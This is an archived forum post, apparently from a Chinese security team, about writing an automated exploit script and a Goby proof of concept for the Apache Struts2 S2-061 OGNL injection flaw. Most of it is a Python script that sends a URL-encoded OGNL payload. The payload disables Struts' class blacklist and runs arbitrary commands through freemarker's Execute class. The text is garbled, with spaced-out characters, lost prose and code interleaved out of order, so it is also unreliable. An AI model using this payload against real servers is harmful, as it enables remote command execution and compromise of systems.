[20410] 2020-12-15_Struts2-061自动化脚本的编写与GobyPOC编写

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-18
2020-12-15_Struts2-061自动化脚本的编写与GobyPOC编写 S t r u t s 2 - 0 6 1 G o b y   P O C K h a n   2 0 2 0 - 1 2 - 1 5   J a k y 0 x 0 0 : S 2 - 0 6 1 S 2 - 0 5 9   O G N L   ,   O G N L   , . 0 x 0 1 : A p a c h e : S t r u t s 2   :   2 . 0 . 0   -   2 . 5 . 2 5 0 x 0 2 : D o c k e r   . h t t p s : / / g i t h u b . c o m / v u l h u b / v u l h u b / t r e e / m a s t e r / s t r u t s 2 / s 2 - 0 6 1
B u r p E X P h t t p s : / / g i t h u b . c o m / v u l h u b / v u l h u b / t r e e / m a s t e r / s t r u t s 2 / s 2 - 0 6 1
0 x 0 3 : P y t h o n   r e q u e s t s G e t , . # ! / u s r / b i n / p y t h o n 3   # a u t h o r : J a k y   # : i m p o r t   r e q u e s t s , s y s , r e i f   l e n ( s y s . a r g v ) < 3 :                 p r i n t ( " [ + ] U s e :   p y h t o n 3   s 2 - 0 6 1 . p y   h t t p : / / i p : p o r t   c o m m a n d " )                 p r i n t ( " [ + ] E x p l a i n :   " )
0 x 0 4 : G o b y   P O C G o b y p o c                 p r i n t ( " [ + ] E x p l a i n :   " )                 p r i n t ( " [ + ] = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = " )                 s y s . e x i t ( ) d e f   J a k y ( ) :         p a y l o a d = " % 2 5 % 7 b ( % 2 7 P o w e r e d _ b y _ U n i c o d e _ P o t a t s 0 % 2 c e n j o y _ i t % 2 7 ) . ( % 2 3 U n i c o d e S e c + % 3 d + % 2 3 a p p l i c a t i o n % 5 b % 2 7 o r g . a p a c h e . t o m c a t . I n s t a n c e M a n a g e r % 2 7 % 5 d ) . ( % 2 3 p o t a t s 0 % 3 d % 2 3 U n i c o d e S e c . n e w I n s t a n c e ( % 2 7 o r g . a p a c h e . c o m m o n s . c o l l e c t i o n s . B e a n M a p % 2 7 ) ) . ( % 2 3 s t a c k v a l u e % 3 d % 2 3 a t t r % 5 b % 2 7 s t r u t s . v a l u e S t a c k % 2 7 % 5 d ) . ( % 2 3 p o t a t s 0 . s e t B e a n ( % 2 3 s t a c k v a l u e ) ) . ( % 2 3 c o n t e x t % 3 d % 2 3 p o t a t s 0 . g e t ( % 2 7 c o n t e x t % 2 7 ) ) . ( % 2 3 p o t a t s 0 . s e t B e a n ( % 2 3 c o n t e x t ) ) . ( % 2 3 s m % 3 d % 2 3 p o t a t s 0 . g e t ( % 2 7 m e m b e r A c c e s s % 2 7 ) ) . ( % 2 3 e m p t y S e t % 3 d % 2 3 U n i c o d e S e c . n e w I n s t a n c e ( % 2 7 j a v a . u t i l . H a s h S e t % 2 7 ) ) . ( % 2 3 p o t a t s 0 . s e t B e a n ( % 2 3 s m ) ) . ( % 2 3 p o t a t s 0 . p u t ( % 2 7 e x c l u d e d C l a s s e s % 2 7 % 2 c % 2 3 e m p t y S e t ) ) . ( % 2 3 p o t a t s 0 . p u t ( % 2 7 e x c l u d e d P a c k a g e N a m e s % 2 7 % 2 c % 2 3 e m p t y S e t ) ) . ( % 2 3 e x e c % 3 d % 2 3 U n i c o d e S e c . n e w I n s t a n c e ( % 2 7 f r e e m a r k e r . t e m p l a t e . u t i l i t y . E x e c u t e % 2 7 ) ) . ( % 2 3 c m d % 3 d % 7 b % 2 7 "         u r l = s y s . a r g v [ 1 ] + " / i n d e x . a c t i o n ? i d = " + p a y l o a d         r = r e q u e s t s . g e t ( u r l ) . t e x t         z = r e . f i n d a l l ( " a   i d = . * " , r )         p r i n t   ( s t r ( z ) . r e p l a c e ( " a   i d = " " , " " ) ) i f   _ _ n a m e _ _   = =   ' _ _ m a i n _ _ ' : J a k y ( )
G e t p a y l o a d
I D . U I D
e x p 0 x 0 5 : A p a c h e   S t r u t s h t t p s : / / s t r u t s . a p a c h e . o r g / d o w n l o a d . c g i # s t r u t s 2 5 2 6
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则